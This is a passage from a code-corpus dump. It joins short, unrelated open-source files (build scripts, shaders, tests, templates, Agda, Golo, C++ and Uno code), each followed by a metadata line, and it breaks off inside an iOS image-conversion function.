ORTED_MAKEFILE=orte/tools/orted/Makefile
if test -z "`grep "orted_LDFLAGS =.*-all-static" ${ORTED_MAKEFILE}`"; then
echo "WARNING: patching ${ORTED_MAKEFILE} to build it static"
sed -i 's/orted_LDFLAGS =/orted_LDFLAGS = -all-static/g' ${ORTED_MAKEFILE}
fi
./configure \
NM=/usr/bin/nm \
CC=gcc \
CXX=g++ \
CFLAGS="-I/opt/xt-pe/default/include/ -I/opt/xt-catamount/default/catamount/linux/include/ " \
CPPFLAGS=-I/opt/xt-pe/default/include/ \
FCFLAGS=-I/opt/xt-pe/default/include/ \
FFLAGS=-I/opt/xt-pe/default/include/ \
LDFLAGS="-L/opt/xt-service/default/lib/snos64 -L/opt/xt-pe/default/cnos/linux/64/lib -L/opt/xt-mpt/default/lib/snos64" \
LIBS="-lpct -lalpslli -lalpsutil -lportals -lpthread" \
--with-wrapper-cflags="-Wmissing-prototypes -I/tmp/work/gshipman/ompi/install/trunk/include" \
--with-wrapper-ldflags="-Wmissing-prototypes -lnsl -lutil -lpct -lalpslli -lalpsutil -lportals -lpthread -lm -L/opt/xt-service/default/lib/snos64 -L/opt/xt-pe/default/cnos/linux/64/lib -L/opt/xt-mpt/default/lib/snos64"\
--build=x86_64-unknown-linux-gnu \
--host=x86_64-cray-linux-gnu \
--disable-mpi-f77\
--disable-mpi-f90\
--without-tm \
--with-platform=./contrib/platform/${PLATFORM} \
--with-io-romio-flags="build_alias=x86_64-unknown-linux-gnu \
host_alias=x86_64-cray-linux-gnu \
--enable-ltdl-convenience --no-recursion" \
--with-alps=yes \
--prefix="$SW_INSTALL_ROOT/$VER" | tee build.log
#gmake all install | tee -a build.log
#chmod -R go+rx $SW_INSTALL_ROOT/$VER-$CMP
| Gnuplot | 4 | j-xiong/ompi | contrib/platform/ornl/ornl_configure.gnu | [
"BSD-3-Clause-Open-MPI"
] |
<div class="video-container"><iframe src="https://www.youtube.com/embed/<%= @id %>?autoplay=0&rel=0&origin=https://changelog.com" frameborder="0"></iframe></div>
| HTML+EEX | 2 | PsOverflow/changelog.com | lib/changelog_web/templates/news_item/_youtube_embed.html.eex | [
"MIT"
] |
Rebol [
Title: "Rebol3 file test script"
Author: "Oldes"
File: %format-test.r3
Tabs: 4
Needs: [%../quick-test-module.r3]
]
secure [%/ allow]
~~~start-file~~~ "FORMAT tests"
===start-group=== "FORMAT"
--test-- "issue-532"
;@@ https://github.com/Oldes/Rebol-issues/issues/532
str: format [8 -8] ["this will overrun" 123]
--assert all [
str = "this wil 123"
16 = length? str
]
===end-group===
~~~end-file~~~ | Rebol | 4 | semarie/rebol3-oldes | src/tests/units/format-test.r3 | [
"Apache-2.0"
] |
precision mediump float;
const float SQRT_2 = 1.4142135623730951;
const float SQRT_3 = sqrt(3.0);
const float PI = 3.14159265358979323846264;
const float IN_ANGLE = 0.6283185307179586; // PI/5. = 36 degrees (star of 5 pikes)
//const float OUT_ANGLE = PI/2. - IN_ANGLE; // External angle for regular stars
const float COS_A = 0.8090169943749475; // cos(IN_ANGLE)
const float SIN_A = 0.5877852522924731; // sin(IN_ANGLE)
const float COS_B = 0.5877852522924731; // cos(OUT_ANGLE)
const float SIN_B = 0.8090169943749475; // sin(OUT_ANGLE)
uniform float u_antialias;
varying vec4 v_line_color;
varying vec4 v_fill_color;
varying float v_linewidth;
varying float v_size;
varying vec2 v_coords;
#ifdef USE_ASTERISK
// asterisk
float marker(vec2 P, float size)
{
// Masks
float diamond = max(abs(SQRT_2 / 2.0 * (P.x - P.y)), abs(SQRT_2 / 2.0 * (P.x + P.y))) - size / 2.0;
float square = max(abs(P.x), abs(P.y)) - size / 2.0;
// Shapes
float X = min(abs(P.x - P.y), abs(P.x + P.y));
float cross = min(abs(P.x), abs(P.y));
// Result is union of masked shapes
float result = min(max(X, diamond), max(cross, square));
return max(result - v_linewidth/2.0 + u_antialias/2.0, 0.0);
}
#endif
#ifdef USE_CIRCLE
// circle
float marker(vec2 P, float size)
{
return length(P) - size/2.0;
}
#endif
#ifdef USE_DOT
float marker(vec2 P, float size)
{
return max(length(P) - size/8.0 - v_linewidth/15.0 + u_antialias, 0.0);
}
#endif
#ifdef USE_CIRCLE_DOT
float marker(vec2 P, float size)
{
float circle = length(P) - size/2.0;
float dot_ = min(size/8.0 + v_linewidth/15.0 - u_antialias - length(P), 0.0);
return max(circle, dot_);
}
#endif
#ifdef USE_SQUARE
// square
float marker(vec2 P, float size)
{
return max(abs(P.x), abs(P.y)) - size/2.0;
}
#endif
#ifdef USE_SQUARE_DOT
float marker(vec2 P, float size)
{
float square = max(abs(P.x), abs(P.y)) - size/2.0;
float dot_ = min(size/8.0 + v_linewidth/15.0 - u_antialias - length(P), 0.0);
return max(square, dot_);
}
#endif
#ifdef USE_DIAMOND
// diamond
float marker(vec2 P, float size)
{
float x = SQRT_2 / 2.0 * (P.x * 1.5 - P.y);
float y = SQRT_2 / 2.0 * (P.x * 1.5 + P.y);
float r1 = max(abs(x), abs(y)) - size / (2.0 * SQRT_2);
return r1 / SQRT_2;
}
#endif
#ifdef USE_DIAMOND_DOT
float marker(vec2 P, float size)
{
float x = SQRT_2 / 2.0 * (P.x * 1.5 - P.y);
float y = SQRT_2 / 2.0 * (P.x * 1.5 + P.y);
float r1 = max(abs(x), abs(y)) - size / (2.0 * SQRT_2);
float diamond = r1 / SQRT_2;
float dot_ = min(size/8.0 + v_linewidth/15.0 - u_antialias - length(P), 0.0);
return max(diamond, dot_);
}
#endif
#ifdef USE_HEX
// hex
float marker(vec2 P, float size)
{
vec2 q = abs(P);
return max(q.y * 0.57735 + q.x - 1.0 * size/2.0, q.y - 0.866 * size/2.0);
}
#endif
#ifdef USE_HEX_DOT
float marker(vec2 P, float size)
{
vec2 q = abs(P);
float hex = max(q.y * 0.57735 + q.x - 1.0 * size/2.0, q.y - 0.866 * size/2.0);
float dot_ = min(size/8.0 + v_linewidth/15.0 - u_antialias - length(P), 0.0);
return max(hex, dot_);
}
#endif
#ifdef USE_STAR
// star
// https://iquilezles.org/www/articles/distfunctions2d/distfunctions2d.htm
float marker(vec2 P, float size)
{
float bn = mod(atan(P.x, -P.y), 2.0*IN_ANGLE) - IN_ANGLE;
P = length(P)*vec2(cos(bn), abs(sin(bn)));
P -= size*vec2(COS_A, SIN_A)/2.;
P += vec2(COS_B, SIN_B)*clamp(-(P.x*COS_B + P.y*SIN_B), 0.0, size*SIN_A/SIN_B/2.);
return length(P)*sign(P.x);
}
#endif
#ifdef USE_STAR_DOT
float marker(vec2 P, float size)
{
float dot_ = min(size/8.0 + v_linewidth/15.0 - u_antialias - length(P), 0.0);
float bn = mod(atan(P.x, -P.y), 2.0*IN_ANGLE) - IN_ANGLE;
P = length(P)*vec2(cos(bn), abs(sin(bn)));
P -= size*vec2(COS_A, SIN_A)/2.;
P += vec2(COS_B, SIN_B)*clamp(-(P.x*COS_B + P.y*SIN_B), 0.0, size*SIN_A/SIN_B/2.);
float star = length(P)*sign(P.x);
return max(star, dot_);
}
#endif
#ifdef USE_TRIANGLE
// triangle
float marker(vec2 P, float size)
{
P.y -= size * 0.3;
float x = SQRT_2 / 2.0 * (P.x * 1.7 - P.y);
float y = SQRT_2 / 2.0 * (P.x * 1.7 + P.y);
float r1 = max(abs(x), abs(y)) - size / 1.6;
float r2 = P.y;
return max(r1 / SQRT_2, r2); // Intersect diamond with rectangle
}
#endif
#ifdef USE_TRIANGLE_DOT
float marker(vec2 P, float size)
{
float dot_ = min(size/8.0 + v_linewidth/15.0 - u_antialias - length(P), 0.0);
P.y -= size * 0.3;
float x = SQRT_2 / 2.0 * (P.x * 1.7 - P.y);
float y = SQRT_2 / 2.0 * (P.x * 1.7 + P.y);
float r1 = max(abs(x), abs(y)) - size / 1.6;
float r2 = P.y;
float triangle = max(r1 / SQRT_2, r2); // Intersect diamond with rectangle
return max(triangle, dot_);
}
#endif
#ifdef USE_INVERTED_TRIANGLE
// inverted_triangle
float marker(vec2 P, float size)
{
P.y += size * 0.3;
float x = SQRT_2 / 2.0 * (P.x * 1.7 - P.y);
float y = SQRT_2 / 2.0 * (P.x * 1.7 + P.y);
float r1 = max(abs(x), abs(y)) - size / 1.6;
float r2 = - P.y;
return max(r1 / SQRT_2, r2); // Intersect diamond with rectangle
}
#endif
#ifdef USE_CROSS
// cross
float marker(vec2 P, float size)
{
float square = max(abs(P.x), abs(P.y)) - size / 2.0;
float cross = min(abs(P.x), abs(P.y));
cross = max(cross - v_linewidth/2.0 + u_antialias/2.0, 0.0);
return max(square, cross);
}
#endif
#ifdef USE_DASH
float marker(vec2 P, float size)
{
float square = max(abs(P.x), abs(P.y)) - size / 2.0;
float cross = abs(P.y);
cross = max(cross - v_linewidth/2.0 + u_antialias/2.0, 0.0);
return max(square, cross);
}
#endif
#ifdef USE_CIRCLE_CROSS
// circle_cross
float marker(vec2 P, float size)
{
// Define quadrants
float qs = size / 2.0; // quadrant size
float s1 = max(abs(P.x - qs), abs(P.y - qs)) - qs;
float s2 = max(abs(P.x + qs), abs(P.y - qs)) - qs;
float s3 = max(abs(P.x - qs), abs(P.y + qs)) - qs;
float s4 = max(abs(P.x + qs), abs(P.y + qs)) - qs;
// Intersect main shape with quadrants (to form cross)
float circle = length(P) - size/2.0;
float c1 = max(circle, s1);
float c2 = max(circle, s2);
float c3 = max(circle, s3);
float c4 = max(circle, s4);
// Union
return min(min(min(c1, c2), c3), c4);
}
#endif
#ifdef USE_SQUARE_CROSS
// square_cross
float marker(vec2 P, float size)
{
// Define quadrants
float qs = size / 2.0; // quadrant size
float s1 = max(abs(P.x - qs), abs(P.y - qs)) - qs;
float s2 = max(abs(P.x + qs), abs(P.y - qs)) - qs;
float s3 = max(abs(P.x - qs), abs(P.y + qs)) - qs;
float s4 = max(abs(P.x + qs), abs(P.y + qs)) - qs;
// Intersect main shape with quadrants (to form cross)
float square = max(abs(P.x), abs(P.y)) - size/2.0;
float c1 = max(square, s1);
float c2 = max(square, s2);
float c3 = max(square, s3);
float c4 = max(square, s4);
// Union
return min(min(min(c1, c2), c3), c4);
}
#endif
#ifdef USE_DIAMOND_CROSS
// diamond_cross
float marker(vec2 P, float size)
{
// Define quadrants
float qs = size / 2.0; // quadrant size
float s1 = max(abs(P.x - qs), abs(P.y - qs)) - qs;
float s2 = max(abs(P.x + qs), abs(P.y - qs)) - qs;
float s3 = max(abs(P.x - qs), abs(P.y + qs)) - qs;
float s4 = max(abs(P.x + qs), abs(P.y + qs)) - qs;
// Intersect main shape with quadrants (to form cross)
float x = SQRT_2 / 2.0 * (P.x * 1.5 - P.y);
float y = SQRT_2 / 2.0 * (P.x * 1.5 + P.y);
float diamond = max(abs(x), abs(y)) - size / (2.0 * SQRT_2);
diamond /= SQRT_2;
float c1 = max(diamond, s1);
float c2 = max(diamond, s2);
float c3 = max(diamond, s3);
float c4 = max(diamond, s4);
// Union
return min(min(min(c1, c2), c3), c4);
}
#endif
#ifdef USE_X
// x
float marker(vec2 P, float size)
{
float circle = length(P) - size / 2.0;
float X = min(abs(P.x - P.y), abs(P.x + P.y));
X = max(X - v_linewidth/2.0, 0.0);
return max(circle, X);
}
#endif
#ifdef USE_Y
float marker(vec2 P, float size)
{
float circle = length(P) - size / 2.0;
float dx = 1.0 / SQRT_3;
float dy = SQRT_2 / SQRT_3;
// Sideways distance from the three spokes.
float d0 = abs(P.x);
float d1 = abs(dot(P, vec2(dx, dy)));
float d2 = abs(dot(P, vec2(dx, -dy)));
// Clip each spoke to semicircle.
d0 = max(d0, -P.y);
d1 = max(d1, dot(P, vec2(-dy, dx)));
d2 = max(d2, dot(P, vec2(dy, dx)));
float Y = min(min(d0, d1), d2);
Y = max(Y - v_linewidth/2.0 + u_antialias/2.0, 0.0);
return max(circle, Y);
}
#endif
#ifdef USE_CIRCLE_X
// circle_x
float marker(vec2 P, float size)
{
float x = P.x - P.y;
float y = P.x + P.y;
// Define quadrants
float qs = size / 2.0; // quadrant size
float s1 = max(abs(x - qs), abs(y - qs)) - qs;
float s2 = max(abs(x + qs), abs(y - qs)) - qs;
float s3 = max(abs(x - qs), abs(y + qs)) - qs;
float s4 = max(abs(x + qs), abs(y + qs)) - qs;
// Intersect main shape with quadrants (to form cross)
float circle = length(P) - size/2.0;
float c1 = max(circle, s1);
float c2 = max(circle, s2);
float c3 = max(circle, s3);
float c4 = max(circle, s4);
// Union
return min(min(min(c1, c2), c3), c4);
}
#endif
#ifdef USE_CIRCLE_Y
float marker(vec2 P, float size)
{
float circle = length(P) - size/2.0;
float dx = 1.0 / SQRT_3;
float dy = SQRT_2 / SQRT_3;
// Sideways distance from the three spokes.
float d0 = abs(P.x);
float d1 = abs(dot(P, vec2(dx, dy)));
float d2 = abs(dot(P, vec2(dx, -dy)));
// Clip each spoke to semicircle.
d0 = max(d0, -P.y);
d1 = max(d1, dot(P, vec2(-dy, dx)));
d2 = max(d2, dot(P, vec2(dy, dx)));
float Y = min(min(d0, d1), d2);
Y = min(v_linewidth/2.0 - u_antialias/2.0 - Y, 0.0);
return max(circle, Y);
}
#endif
#ifdef USE_SQUARE_X
// square_x
float marker(vec2 P, float size)
{
float x = P.x - P.y;
float y = P.x + P.y;
// Define quadrants
float qs = size / 2.0; // quadrant size
float s1 = max(abs(x - qs), abs(y - qs)) - qs;
float s2 = max(abs(x + qs), abs(y - qs)) - qs;
float s3 = max(abs(x - qs), abs(y + qs)) - qs;
float s4 = max(abs(x + qs), abs(y + qs)) - qs;
// Intersect main shape with quadrants (to form cross)
float square = max(abs(P.x), abs(P.y)) - size/2.0;
float c1 = max(square, s1);
float c2 = max(square, s2);
float c3 = max(square, s3);
float c4 = max(square, s4);
// Union
return min(min(min(c1, c2), c3), c4);
}
#endif
#ifdef USE_PLUS
float marker(vec2 P, float size)
{
vec2 size2 = vec2(size*0.5, size*0.2);
P = abs(P);
P = (P.y > P.x) ? P.yx : P.xy;
vec2 q = P - size2;
float k = max(q.y, q.x);
vec2 w = (k > 0.0) ? q : vec2(size2.y - P.x, -k);
return sign(k)*length(max(w, 0.0));
}
#endif
#ifdef USE_SQUARE_PIN
float marker(vec2 P, float size)
{
float actual_size = size*1.2;
float radius = 0.75*actual_size; // Radius of curvature of edges.
float offset = actual_size/2.0 + sqrt(radius*radius - actual_size*actual_size/4.0);
vec2 centerx = vec2(offset, 0.0);
vec2 centery = vec2(0.0, offset);
float right = length(P - centerx);
float left = length(P + centerx);
float up = length(P - centery);
float down = length(P + centery);
float pin = radius - min(min(right, left), min(up, down));
float circle = length(P) - actual_size*0.6;
return max(circle, pin);
}
#endif
#ifdef USE_TRIANGLE_PIN
float marker(vec2 P, float size)
{
float actual_size = size*1.2;
float radius = 1.2*actual_size; // Radius of curvature of edges.
float angle = 2.0*PI / 3.0;
float c = cos(angle);
float s = sin(angle);
mat2 rotation = mat2(c, -s, s, c);
// Half the length of straight triangle edge.
float half_edge = actual_size*SQRT_3/4.0;
// Distance from center of triangle to middle of straight edge.
float centre_middle_edge = 0.25*actual_size;
float offset = centre_middle_edge + sqrt(radius*radius - half_edge*half_edge);
// Centre of curvature.
vec2 center = vec2(0.0, offset);
float dist0 = length(P - center);
P = rotation*P;
float dist1 = length(P - center);
P = rotation*P;
float dist2 = length(P - center);
float pin = radius - min(min(dist0, dist1), dist2);
float circle = length(P) - actual_size / 2.0;
return max(circle, pin);
}
#endif
vec4 outline(float distance, float linewidth, float antialias, vec4 line_color,
vec4 fill_color)
{
vec4 frag_color;
float t = min(linewidth/2.0 - antialias, 0.0); // Line half-width.
float signed_distance = distance;
float border_distance = abs(signed_distance) - t;
float alpha = border_distance/antialias;
alpha = exp(-alpha*alpha);
// If line alpha is zero, it probably means no outline. To avoid a dark
// outline shining through due to antialiasing, we set the line color to the
// fill color.
float select = float(bool(line_color.a));
line_color.rgb = select*line_color.rgb + (1.0 - select)*fill_color.rgb;
// Similarly, if we want a transparent fill.
select = float(bool(fill_color.a));
fill_color.rgb = select*fill_color.rgb + (1.0 - select)*line_color.rgb;
if (border_distance < 0.0)
frag_color = line_color;
else if (signed_distance < 0.0)
frag_color = mix(fill_color, line_color, sqrt(alpha));
else {
if (abs(signed_distance) < linewidth/2.0 + antialias)
frag_color = vec4(line_color.rgb, line_color.a*alpha);
else
discard;
}
return frag_color;
}
void main()
{
float distance = marker(v_coords, v_size);
gl_FragColor = outline(
distance, v_linewidth, u_antialias, v_line_color, v_fill_color);
gl_FragColor.rgb *= gl_FragColor.a; // Premultiplied alpha.
}
| GLSL | 5 | g-parki/bokeh | bokehjs/src/lib/models/glyphs/webgl/markers.frag | [
"BSD-3-Clause"
] |
CALL gn gen out/Default
CALL ninja -j 200 -C out/Default chrome eventlog_provider
| Batchfile | 1 | NareshMurthy/playwright | browser_patches/chromium/buildwingoma.bat | [
"Apache-2.0"
] |
{
"props": {
"children": { "type": { "name": "node" } },
"classes": { "type": { "name": "object" } },
"max": { "type": { "name": "custom", "description": "number" }, "default": "5" },
"spacing": {
"type": {
"name": "union",
"description": "'medium'<br>| 'small'<br>| number"
},
"default": "'medium'"
},
"sx": {
"type": {
"name": "union",
"description": "Array<func<br>| object<br>| bool><br>| func<br>| object"
}
},
"total": { "type": { "name": "number" }, "default": "children.length" },
"variant": {
"type": {
"name": "union",
"description": "'circular'<br>| 'rounded'<br>| 'square'<br>| string"
},
"default": "'circular'"
}
},
"name": "AvatarGroup",
"styles": { "classes": ["root", "avatar"], "globalClasses": {}, "name": "MuiAvatarGroup" },
"spread": true,
"forwardsRefTo": "HTMLDivElement",
"filename": "/packages/mui-material/src/AvatarGroup/AvatarGroup.js",
"inheritance": null,
"demos": "<ul><li><a href=\"/components/avatars/\">Avatars</a></li></ul>",
"cssComponent": false
}
| JSON | 3 | VirdocsSoftware/rs-icons | docs/pages/api-docs/avatar-group.json | [
"MIT"
] |
package test
public final annotation class A1 : kotlin.Annotation {
/*primary*/ public constructor A1()
}
public final annotation class A2 : kotlin.Annotation {
/*primary*/ public constructor A2()
}
public final annotation class A3 : kotlin.Annotation {
/*primary*/ public constructor A3()
}
@test.A1 @test.A2 @test.A3 public final class Class {
/*primary*/ public constructor Class()
}
| Text | 4 | qussarah/declare | compiler/testData/loadJava/compiledKotlin/annotations/classes/MultipleAnnotations.txt | [
"Apache-2.0"
] |
// force-host
// no-prefer-dynamic
#![feature(proc_macro_quote)]
#![feature(proc_macro_internals)] // FIXME - this shouldn't be necessary
#![crate_type = "proc-macro"]
extern crate proc_macro;
extern crate custom_quote;
use proc_macro::{quote, TokenStream};
macro_rules! expand_to_quote {
() => {
quote! {
let bang_error: bool = 25;
}
}
}
#[proc_macro]
pub fn error_from_bang(_input: TokenStream) -> TokenStream {
expand_to_quote!()
}
#[proc_macro]
pub fn other_error_from_bang(_input: TokenStream) -> TokenStream {
custom_quote::custom_quote! {
my_ident
}
}
#[proc_macro_attribute]
pub fn error_from_attribute(_args: TokenStream, _input: TokenStream) -> TokenStream {
quote! {
struct AttributeError {
field: MissingType
}
}
}
#[proc_macro_derive(ErrorFromDerive)]
pub fn error_from_derive(_input: TokenStream) -> TokenStream {
quote! {
enum DeriveError {
Variant(OtherMissingType)
}
}
}
| Rust | 3 | mbc-git/rust | src/test/ui/proc-macro/auxiliary/span-from-proc-macro.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
@import './dir/*.css';
.index {
color: red;
}
| CSS | 1 | johanberonius/parcel | packages/core/integration-tests/test/integration/glob-css/index.css | [
"MIT"
] |
open import Agda.Builtin.Reflection
open import Agda.Builtin.List
open import Agda.Builtin.Unit
macro
m-0 : Term → TC ⊤
m-0 goal =
bindTC (inferType goal) λ where
(pi (arg (arg-info _ (modality _ quantity-0)) _) _) →
bindTC (quoteTC (λ (_ : Set) → Set))
(unify goal)
type → typeError (termErr type ∷ [])
m-ω : Term → TC ⊤
m-ω goal =
bindTC (inferType goal) λ where
(pi (arg (arg-info _ (modality _ quantity-ω)) _) _) →
bindTC (quoteTC (λ (_ : Set) → Set))
(unify goal)
type → typeError (termErr type ∷ [])
_ : @0 Set → Set₁
_ = m-0
_ : @ω Set → Set₁
_ = m-ω
postulate
f : @0 Set₁ → Set₁
macro
m₁ : Set₁ → Term → TC ⊤
m₁ A goal =
bindTC (quoteTC A) λ A →
unify goal
(def (quote f)
(arg (arg-info visible (modality relevant quantity-0)) A ∷
[]))
_ : Set₁ → Set₁
_ = λ A → m₁ A
macro
m₂ : Set₁ → Term → TC ⊤
m₂ A goal =
bindTC (quoteTC A) λ A →
unify goal
(def (quote f)
-- The modality is ignored.
(arg (arg-info visible (modality irrelevant quantity-ω)) A ∷
[]))
_ : Set₁ → Set₁
_ = λ A → m₂ A
| Agda | 4 | cruhland/agda | test/Succeed/Issue5317.agda | [
"MIT"
] |
<table><tr><th>id</th><th>message</th></tr>{% for fortune in fortunes %}<tr><td>{{ fortune.getId() }}</td><td>{{ fortune.message | e }}</td></tr>{% endfor %}</table> | Volt | 3 | efectn/FrameworkBenchmarks | frameworks/PHP/phalcon/app/views/mongo/fortunes.volt | [
"BSD-3-Clause"
] |
#!/usr/bin/env golosh
module audiostreamerscrobbler.Audiostreamerscrobbler
import audiostreamerscrobbler.factories.{Config, PlayerControlThreadFactory, ScrobblersFactory, ScrobblerErrorHandlerFactory}
import audiostreamerscrobbler.utils.{NetworkUtils, VerySimpleArgsParser}
import gololang.IO
import java.util.Arrays
function main = |args| {
run(args)
}
local function run = |args| {
let isHandled = handleCommandLineOptions(args)
if (isHandled) {
return
}
let isConfigFileValid = validateAndInitConfig()
if (not isConfigFileValid) {
return
}
let scrobblerErrorHandler = createScrobblerErrorHandlerFactory(): createScrobblerErrorHandler()
scrobblerErrorHandler: start()
let playerControlThreadFactory = createPlayerControlThreadFactory()
let playerControlThread = playerControlThreadFactory: createPlayerControlThread(scrobblerErrorHandler)
playerControlThread: start()
}
local function validateAndInitConfig = {
if not fileExists("config.json") {
println("Configuration file \"config.json\" was not found in the current directory.")
println("See project's website \"https://github.com/vvdleun/audiostreamerscrobbler\" for an example.")
println("\nAt this time, this file must be created and configured manually.")
return false
}
try {
initConfig()
let config = getConfig()
} catch(ex) {
println("Error while reading config.json. Please check whether the file is valid JSON and uses UTF-8 encoding.")
println("\nPlease accept our apologies for the fact that this file has to be edited manually for now. For the future an user-friendly GUI editor feature is planned.")
println("\nReported error: " + ex)
return false
}
return true
}
local function handleCommandLineOptions = |args| {
let parser = createVerySimpleArgsParser(args)
var option = parser: parseNext()
while (option != null) {
case {
when option == "--authorize" {
return authorizeService(parser)
}
when option == "--networkinterfaces" {
return showNetworkInterfaces()
}
otherwise {
return showHelp(option)
}
}
option = parser: parseNext()
}
return false
}
local function showHelp = |option| {
if (option != "--help") {
println("Unrecognized option: \"" + option + "\"\n")
}
println("Valid options:\n")
println("--authorize [" + getScrobblerKeyNames():join("|") + "]")
println(" Starts the authorization process for the specified music tracking service.\n")
println("--networkinterfaces")
println(" Shows network interface names and addresses that can be used in configuration file")
println("--help")
println(" Shows this help screen\n")
return true
}
local function authorizeService = |parser| {
try {
_authorizeService(parser)
} catch(ex) {
println("\nUnexpected error occurred: " + ex)
println("")
throw ex
}
return true
}
local function _authorizeService = |parser| {
let service = parser: parseNext()
if (service is null) {
println("No service specified. Valid syntax: --authorize [" + getScrobblerKeyNames(): join("|") + "]\n")
println("Example: --authorize " + getScrobblerKeyNames(): get(0))
return
}
let isConfigFileValid = validateAndInitConfig()
if (not isConfigFileValid) {
return
}
let scrobblersFactory = createScrobblersFactory()
let authorizer = scrobblersFactory: createScrobblerAuthorizer(service)
if (authorizer == null) {
println("Specified scrobbler service '" + service + "' is unknown. Known services are: " + getScrobblerKeyNames(): join(", "))
return
}
authorizer: authorize()
}
local function showNetworkInterfaces = {
getNetworkInterfaces(): each(|i| {
println("Alias : \"" + i: getName() + "\"")
println("Name : \"" + i: getDisplayName() + "\"")
println("Addresses: " + ["\"" + a: getHostAddress() + "\"" foreach a in getInetAddresses(i)]: join(" "))
println("\n\n")
})
return true
} | Golo | 4 | vvdleun/audiostreamerscrobbler | src/main/golo/Audiostreamerscrobbler.golo | [
"MIT"
] |
rendered template for <%= @name %>
| HTML+EEX | 1 | faheempatel/phoenix | test/fixtures/templates/user/render_template.html.eex | [
"MIT"
] |
import "std/test"
test.run("Compound equality", fn(assert) {
const a = 5
const b = 6
const c = 5
assert.isFalse(a >= b)
assert.isFalse(b <= a)
assert.isTrue(a <= c)
assert.isTrue(a >= c)
})
test.run("Compound assignment", fn(assert) {
let a = 5
a += 2
assert.isEq(a, 7)
a -= 3
assert.isEq(a, 4)
a *= 2
assert.isEq(a, 8)
a /= 4
assert.isEq(a, 2)
})
| Inform 7 | 4 | lfkeitel/nitrogen | tests/basic/compounds.ni | [
"BSD-3-Clause"
] |
-- (c) 2009 Aarne Ranta under LGPL
instance LexFoodsGer of LexFoods =
open SyntaxGer, ParadigmsGer in {
flags coding=utf8;
oper
wine_N = mkN "Wein" ;
pizza_N = mkN "Pizza" "Pizzen" feminine ;
cheese_N = mkN "Käse" "Käse" masculine ;
fish_N = mkN "Fisch" ;
fresh_A = mkA "frisch" ;
warm_A = mkA "warm" "wärmer" "wärmste" ;
italian_A = mkA "italienisch" ;
expensive_A = mkA "teuer" ;
delicious_A = mkA "köstlich" ;
boring_A = mkA "langweilig" ;
}
| Grammatical Framework | 4 | JavascriptID/sourcerer-app | src/test/resources/samples/langs/Grammatical Framework/LexFoodsGer.gf | [
"MIT"
] |
const { powerSaveBlocker } = process._linkedBinding('electron_browser_power_save_blocker');
export default powerSaveBlocker;
| TypeScript | 2 | lingxiao-Zhu/electron | lib/browser/api/power-save-blocker.ts | [
"MIT"
] |
/*
* Copyright (c) 2021, Tim Flynn <trflynn89@pm.me>
*
* SPDX-License-Identifier: BSD-2-Clause
*/
#include "LoadRequest.h"
#include <LibWeb/Cookie/Cookie.h>
#include <LibWeb/Page/Page.h>
namespace Web {
LoadRequest LoadRequest::create_for_url_on_page(const AK::URL& url, Page* page)
{
LoadRequest request;
request.set_url(url);
if (page) {
String cookie = page->client().page_did_request_cookie(url, Cookie::Source::Http);
if (!cookie.is_empty())
request.set_header("Cookie", cookie);
}
return request;
}
}
| C++ | 4 | r00ster91/serenity | Userland/Libraries/LibWeb/Loader/LoadRequest.cpp | [
"BSD-2-Clause"
] |
@font-face{font-family:MyHelvetica;src:local('Helvetica Neue Bold'), local('HelveticaNeue-Bold'), url(MgOpenModernaBold.ttf);font-weight:bold} | CSS | 1 | Theo-Steiner/svelte | test/css/samples/supports-font-face/expected.css | [
"MIT"
] |
using Uno;
using Uno.Platform;
using Uno.Collections;
using Uno.Platform.iOS;
using Uno.Compiler.ExportTargetInterop;
using Fuse.Platform;
using Uno.Graphics;
namespace Fuse.iOS
{
[Require("Source.Include", "@{Uno.Platform.iOS.Application:Include}")]
[Require("Source.Include", "Foundation/Foundation.h")]
[Require("Source.Include", "CoreGraphics/CoreGraphics.h")]
[Require("Source.Include", "UIKit/UIKit.h")]
[Set("FileExtension", "mm")]
public extern(IOS) static class Support
{
public static Texture2D CreateTextureFromImage(UIImage image)
{
int2 bitmapSize = UIImageGetSize(image);
byte[] bitmap = UIImageToRGBA8888(image);
Texture2D texture = new Texture2D(bitmapSize, Format.RGBA8888, false);
texture.Update(extern<IntPtr>(bitmap) "$0->Ptr()");
return texture;
}
static int2 UIImageGetSize(UIImage image)
@{
CGSize imageSize = image.size;
int width = (int) imageSize.width;
int height = (int) imageSize.height;
return @{Uno.Int2(int,int):New(width, height)};
@}
static byte[] UIImageToRGBA8888(UIImage _image)
@{
CGImageRef image = [((UIImage*)_image) CGImage];
if (image == NULL)
return NULL;
UIImageOrientation orientation = _image.imageOrientation;
CGRect imageRect = CGRectMake(0, 0, CGImageGetWidth(image), CGImageGetHeight(image));
int bitmapWidth = imageRect.size.width;
int bitmapHeight = imageRect.size.height;
if (int(orientation) & 0x2)
{
// Transpose for Left* and Right* orientations
bitmapWidth = imageRect.size.height;
bitmapHeight = imageRect.size.width;
}
uArray *bitmap = @{byte[]:New(bitmapWidth * bitmapHeight * 4)};
CGColorSpaceRef colorSpace = CGColorSpaceCreateDeviceRGB();
CGContextRef context = CGBitmapContextCreate(bitmap->Ptr(),
bitmapWidth, bitmapHeight, 8, 4 * bitmapWidth, colorSpace,
kCGImageAlphaPremultipliedLast | kCGBitmapByteOrder32Big);
switch (orientation)
{
// Right side up
case UIImageOrientationUp:
break;
case UIImageOrientationUpMirrored:
CGContextTranslateCTM(context, imageRect.size.width, 0);
CGContextScaleCTM(context, -1., 1.);
break;
// Upside down
case UIImageOrientationDown:
CGContextRotateCTM(context, M_PI);
CGContextTranslateCTM(
context, -imageRect.size.width, -imageRect.size.height);
break;
case UIImageOrientationDownMirrored:
CGContextRotateCTM(context, M_PI);
CGContextTranslateCTM(context, 0, -imageRect.size.height);
CGContextScaleCTM(context, -1., 1.);
break;
// Left
case UIImageOrientationLeft:
CGContextRotateCTM(context, M_PI_2);
CGContextTranslateCTM(context, 0, -imageRect.size.height);
break;
case UIImageOrientationLeftMirrored:
CGContextRotateCTM(context, M_PI_2);
CGContextTranslateCTM(
context, imageRect.size.width, -imageRect.size.height);
CGContextScaleCTM(context, -1., 1.);
break;
// Right
case UIImageOrientationRight:
CGContextRotateCTM(context, -M_PI_2);
CGContextTranslateCTM(context, -imageRect.size.width, 0);
break;
case UIImageOrientationRightMirrored:
CGContextRotateCTM(context, -M_PI_2);
CGContextScaleCTM(context, -1., 1.);
break;
}
CGContextDrawImage(context, imageRect, image);
CGContextRelease(context);
CGColorSpaceRelease(colorSpace);
return bitmap;
@}
public static extern int2 CGPointToUnoInt2(uCGPoint point, float scale)
@{
@{Uno.Int2} unoPoint;
unoPoint.X = $0.x * $1;
